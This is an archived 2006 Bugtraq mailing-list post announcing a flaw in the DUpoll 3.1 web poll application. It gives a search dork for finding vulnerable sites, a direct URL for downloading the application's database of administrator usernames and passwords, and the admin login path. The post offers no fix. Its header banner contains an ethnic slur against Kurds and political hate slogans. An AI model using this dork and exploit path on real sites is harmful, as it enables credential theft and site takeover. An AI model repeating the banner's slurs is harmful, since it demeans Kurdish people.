lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060829160348.5006.qmail@securityfocus.com>
Date: 29 Aug 2006 16:03:48 -0000
From: bozkurtserdar@...kurtserdar.com
To: bugtraq@...urityfocus.com
Subject: DUpoll 3.1 security alert

#############################################################################
#DUpoll 3.1 application bug                                                 #
#                                                                           #
#BoZKuRTSeRDaR Ülkücü Milliyetçi Türkçü &#304;nternet korsan&#305;                    #
#                                                                           #
#kahrolsun pkk kahrolsun Komünizm fuck kurdish lamerz                       #
#                                                                           #
#Discovered by: BoZKuRTSeRDaR bozkurtserdar[at]bozkurtserdar[dot]com        #
#                                                                           # 
#                                                                           #
#############################################################################

Vendor URL : DUpoll http://www.duware.com/demos/DUpoll/

Dork/Search for: "Powered by DUpoll"

Exploit :

http://www.target.com/[DUpollpatch]/_private/Dupoll.mdb

database downloading

database users table administratory users and pasword

go dir 

http://www.target.com/[DUpollpatch]/admin/default.asp 

Security Adivisory | Edithor by BoZKuRTSeRDaR 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ